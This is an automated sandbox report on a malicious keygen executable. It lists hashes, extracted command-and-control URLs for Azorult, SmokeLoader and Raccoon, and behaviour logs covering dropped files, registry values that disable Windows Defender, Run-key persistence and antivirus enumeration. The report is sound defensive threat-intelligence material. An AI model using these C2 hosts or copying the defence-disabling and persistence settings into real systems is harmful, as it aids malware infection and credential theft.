Analysis
-
max time kernel
568s -
max time network
1782s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:55
Static task
static1
Behavioral task
behavioral1
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
General
-
Target
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
-
Size
5.2MB
-
MD5
9e12e3e503674039878cb7542a30f33c
-
SHA1
789b75006358e62cff26877e4fc5fdd31f7e8a76
-
SHA256
714b89115f9f4b3979e2f70ad6eb9e7d81fbcd8a8c984d7271adf01c8ecbcd36
-
SHA512
0091f4b40a06cadb0e12f1066dcb2c79a0ffa60bcc873761751e3f7feb85e30a38ba29cbbb29f3f32fa810236055044978533186942c07d0070e64b3e4dac544
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral4/memory/2668-213-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral4/memory/2668-215-0x0000000002520000-0x0000000002E2A000-memory.dmp family_glupteba behavioral4/memory/2668-216-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 6232 created 2188 6232 WerFault.exe 147 PID 7272 created 6004 7272 WerFault.exe 143 -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 6604 created 2668 6604 svchost.exe 130 PID 6604 created 5920 6604 svchost.exe 236 PID 6604 created 7356 6604 svchost.exe 445 PID 6604 created 7356 6604 svchost.exe 445 PID 6604 created 8484 6604 svchost.exe 446 PID 6604 created 8484 6604 svchost.exe 446 PID 6604 created 6992 6604 svchost.exe 329 PID 6604 created 8012 6604 svchost.exe 331 PID 6604 created 9100 6604 svchost.exe 501 PID 6604 created 9100 6604 svchost.exe 501 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral4/memory/5188-148-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5188-150-0x00000001402CA898-mapping.dmp xmrig behavioral4/memory/5188-152-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/5188-277-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/8232-804-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/8304-805-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/8304-835-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/8232-885-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 17 IoCs
flow pid Process 193 5188 msiexec.exe 254 4580 MsiExec.exe 256 4580 MsiExec.exe 260 4580 MsiExec.exe 262 4580 MsiExec.exe 266 4580 MsiExec.exe 262 4580 MsiExec.exe 256 4580 MsiExec.exe 262 4580 MsiExec.exe 266 4580 MsiExec.exe 428 7512 powershell.exe 254 4580 MsiExec.exe 256 4580 MsiExec.exe 193 5188 msiexec.exe 260 4580 MsiExec.exe 689 8304 msiexec.exe 728 8232 msiexec.exe -
Drops file in Drivers directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ppppppfy.exe File opened for modification C:\Windows\System32\drivers\SET2B7C.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET2B7C.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe -
Executes dropped EXE 64 IoCs
pid Process 4360 keygen-pr.exe 3140 keygen-step-1.exe 4048 keygen-step-3.exe 4428 keygen-step-4.exe 1556 key.exe 1948 Setup.exe 2600 multitimer.exe 2944 setups.exe 1896 askinstall20.exe 196 setups.tmp 1116 Full_Version.exe 1168 multitimer.exe 4464 file.exe 1456 multitimer.exe 1268 908D.tmp.exe 1300 9244.tmp.exe 1120 md2_2efs.exe 5572 dteryuxm5so.exe 5588 Setup3310.exe 5564 cpyrix.exe 5688 Setup3310.tmp 5732 vict.exe 5724 muwrgmlshuf.exe 5780 p4uee4nr31a.exe 5888 vict.tmp 5904 muwrgmlshuf.tmp 2668 app.exe 4160 vpn.exe 5352 vpn.tmp 5396 g4pugkmvbnp.exe 5544 IBInstaller_97039.exe 5880 IBInstaller_97039.tmp 6040 Setup.exe 6004 win1host.exe 5944 winlthsth.exe 5844 hjjgaa.exe 2188 RunWW.exe 5184 jg7_7wjg.exe 5520 LabPicV3.exe 5328 lylal220.exe 2184 1.exe 5912 22.exe 5776 guihuali-game.exe 5460 HookSetp.exe 6048 lylal220.tmp 6128 LabPicV3.tmp 6104 Conhost.exe 3516 f49msXwaGcZo.exe 5728 2.exe 4632 jfiag3g_gg.exe 3600 jfiag3g_gg.exe 5464 ppppppfy.exe 416 Microsoft.exe 5236 multitimer.exe 5284 setups.exe 5592 AdvancedRun.exe 2112 setups.tmp 804 2.exe 2416 tapinstall.exe 3700 TSCfPHLZs.exe 1816 eCUEGYWHo.exe 5288 BTRSetp.exe 5760 AdvancedRun.exe 908 multitimer.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation multitimer.exe -
Loads dropped DLL 64 IoCs
pid Process 196 setups.tmp 196 setups.tmp 196 setups.tmp 196 setups.tmp 196 setups.tmp 196 setups.tmp 196 setups.tmp 3968 rundll32.exe 5688 Setup3310.tmp 5688 Setup3310.tmp 5904 muwrgmlshuf.tmp 5888 vict.tmp 5352 vpn.tmp 5352 vpn.tmp 5396 g4pugkmvbnp.exe 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5352 vpn.tmp 5880 IBInstaller_97039.tmp 6048 lylal220.tmp 6128 LabPicV3.tmp 5436 MsiExec.exe 5436 MsiExec.exe 5436 MsiExec.exe 2112 setups.tmp 2112 setups.tmp 2112 setups.tmp 2112 setups.tmp 2112 setups.tmp 2112 setups.tmp 2112 setups.tmp 4092 rundll32.exe 8 rundll32.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 4580 MsiExec.exe 7296 Setup3310.tmp 7296 Setup3310.tmp 7288 vpn.tmp 7288 vpn.tmp 7288 vpn.tmp 7288 vpn.tmp 8092 vict.tmp 7320 toolspab1.exe 6652 client32.exe 6652 client32.exe 6652 client32.exe 6652 client32.exe 6652 client32.exe 6652 client32.exe 5856 mask_svc.exe 5856 mask_svc.exe 5856 mask_svc.exe 5856 mask_svc.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\1.exe = "0" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 19 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" CEFA.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ql0aduhzmuf = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RH13SCFPRH\\multitimer.exe\" 1 3.1617537653.6069aa75aac33" BDB5.tmp.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BDB5.tmp.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CEFA.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\qjyhrnngl5s = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\4G0S6ZSZGF\\multitimer.exe\" 1 3.1617537381.6069a9656ec0a" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\m52hd22gtwu = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\EMYCRSI2IH\\multitimer.exe\" 1 3.1617537699.6069aaa350250" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\upxtvdlskl1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\N1O9BQ6682\\multitimer.exe\" 1 3.1617537752.6069aad86c952" 1.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 908D.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Woxaetodika.exe\"" ppppppfy.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --anbfs" Weather_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fz4ze4bdxq5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\1KCU8FXJN8\\multitimer.exe\" 1 3.1617537651.6069aa73329d5" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" BDB5.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" 908D.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\lcvw3wzqwa0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\TFN7MAMTVN\\multitimer.exe\" 1 3.1617537482.6069a9ca24640" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Poshaegegary.exe\"" Microsoft.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA multitimer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: g4pugkmvbnp.exe File opened (read-only) \??\I: g4pugkmvbnp.exe File opened (read-only) \??\P: g4pugkmvbnp.exe File opened (read-only) \??\S: g4pugkmvbnp.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: g4pugkmvbnp.exe File opened (read-only) \??\N: g4pugkmvbnp.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: g4pugkmvbnp.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: g4pugkmvbnp.exe File opened (read-only) \??\M: g4pugkmvbnp.exe File opened (read-only) \??\O: g4pugkmvbnp.exe File opened (read-only) \??\Q: g4pugkmvbnp.exe File opened (read-only) \??\W: g4pugkmvbnp.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: g4pugkmvbnp.exe File opened (read-only) \??\V: g4pugkmvbnp.exe File opened (read-only) \??\Y: g4pugkmvbnp.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\G: g4pugkmvbnp.exe File opened (read-only) \??\K: g4pugkmvbnp.exe File opened (read-only) \??\X: g4pugkmvbnp.exe File opened (read-only) \??\Z: g4pugkmvbnp.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: g4pugkmvbnp.exe File opened (read-only) \??\B: g4pugkmvbnp.exe File opened (read-only) \??\H: g4pugkmvbnp.exe File opened (read-only) \??\L: g4pugkmvbnp.exe File opened (read-only) \??\R: g4pugkmvbnp.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 136 ipinfo.io 140 ipinfo.io 197 ip-api.com 755 ipinfo.io 1160 ipinfo.io 341 ipinfo.io 347 ipinfo.io 778 ipinfo.io 990 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\DBQPAO8L.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\SET1786.tmp 2.exe File created C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\SET1787.tmp 2.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\tap0901.cat 2.exe File created C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\SET1798.tmp 2.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat 2.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt 2.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\DBQPAO8L.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\SET1787.tmp 2.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\tap0901.sys 2.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys 2.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF dw20.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\SET1786.tmp 2.exe File created C:\Windows\System32\DriverStore\drvstore.tmp 2.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f} 2.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 8479C5B1309BB4B8 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\oemvista.inf 2.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1ae1b4f4-428a-0d49-9c00-0441332b551f}\SET1798.tmp 2.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf 2.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 42 IoCs
